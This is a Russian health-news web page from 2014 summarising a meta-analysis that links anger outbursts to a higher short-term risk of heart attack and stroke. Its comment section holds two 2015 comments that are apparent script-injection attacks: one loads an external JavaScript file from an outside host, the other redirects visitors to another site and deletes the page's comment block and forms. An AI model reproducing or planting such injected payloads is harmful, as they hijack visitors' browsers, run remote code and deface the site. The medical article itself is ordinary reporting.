Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Не психуй! Взрывы гнева у...  >>  Не психуй! Взрывы гнева увеличивают шансы инфаркта!
 
Обратная связь
 

Не психуй! Взрывы гнева увеличивают шансы инфаркта!

Размер шрифта
08 сентября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Как оказалось, злиться – вредно для здоровья. Недавнее исследование дает новую причину для того, чтобы оставаться спокойным под действием стресса. Ученые утверждают, что всплески гнева могут повышать риск возникновения инфаркта или инсульта в течение нескольких часов после произошедшего.

Не психуй! Взрывы гнева увеличивают шансы инфаркта!

Исследователи подчеркивают, что абсолютный риск возникновения проблем с сердцем после приступа ярости все же остается очень низким. Однако анализ многих работ показал, что этот риск все-таки значительно выше в сравнении с таковым во время периодов душевного спокойствия.

«Неудивительно, что мы наблюдаем такую связь, ведь мы знаем, что гнев связан с повышенной реакцией нервной системы на стресс», – рассказывает доктор Срипал Бангалур, профессор из медицинского центра Университета Нью-Йорка.

Эта нездоровая реакция включает в себя «повышение частоты сердцебиений и артериального давления, которые могут привести к мгновенным негативным последствиям», – поясняет доктор Бангалур.

В новом исследовании ученые проанализировали результаты девяти работ, проведенных с 1966 по 2013 год. В них были изучены данные о 4 500 случаях инфаркта, 462 случаях острого коронарного синдрома (общий термин для обозначения инфаркта и болей в сердце), о более чем 800 случаях инсульта и более 300 нарушениях сердечного ритма.

В течение двух часов после вспышки гнева риск возникновения инфаркта или острого коронарного синдрома был в пять раз выше, риск инсульта – выше в четыре раза. Риск развития опасного нарушения ритма сердца, желудочковой аритмии, также возрастал.

По данным исследования, опубликованного в European Heart Journal,  риск был наиболее высок у тех людей, кто чаще испытывал приступы гнева, а также у тех, у кого уже существовали проблемы с сердцем.

В работе, возглавляемой Элизабет Мостофски, преподавателя из Гарвардской Школы Здравоохранения, сообщается, что так как вспышки гнева относительно редки и их эффект временный, то «их влияние на абсолютный риск возникновения проблем с сердцем довольно мал». Но для определенной группы людей, по словам Мостофски, этот риск значительно выше.

«Хотя риск развития острого заболевания сердца из-за единичного приступа гнева относительно низок, этот риск может накапливаться у людей, у которых такие приступы случаются часто», – добавляет Элизабет. «Это особенно важно для тех, у кого уже есть определенные факторы риска или тех, кто уже перенес инфаркт, инсульт или страдает от диабета».

«К примеру, человек без факторов риска заболеваний сердца, у которого в месяц случается всего одна вспышка гнева, будет иметь очень маленький дополнительный риск. Но в то же время человек с множеством факторов риска, у которого уже был инфаркт или инсульт, который часто злится, имеет гораздо большую дополнительную вероятность возникновения проблем с сердцем», – говорит доктор Мостофски.

Будьте спокойнее, не поддавайтесь давлению стрессовых ситуаций – тем самым вы поможете своему сердцу дольше оставаться здоровым.

Другие статьи о вашем внутреннем моторе ищите на страницах нашего специального проекта «Близко к сердцу».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:29

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как угробить свое сердце?!   10 ужасов недосыпа   Худшие соусы   Добавки с витамином В спасают от инсульта  
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 22 июня 2013Грецкие орехи спасут от инфаркта
 
20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
Зачем спать 10 затем
Чем страшен диабет?
Что заставит вас храпеть

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.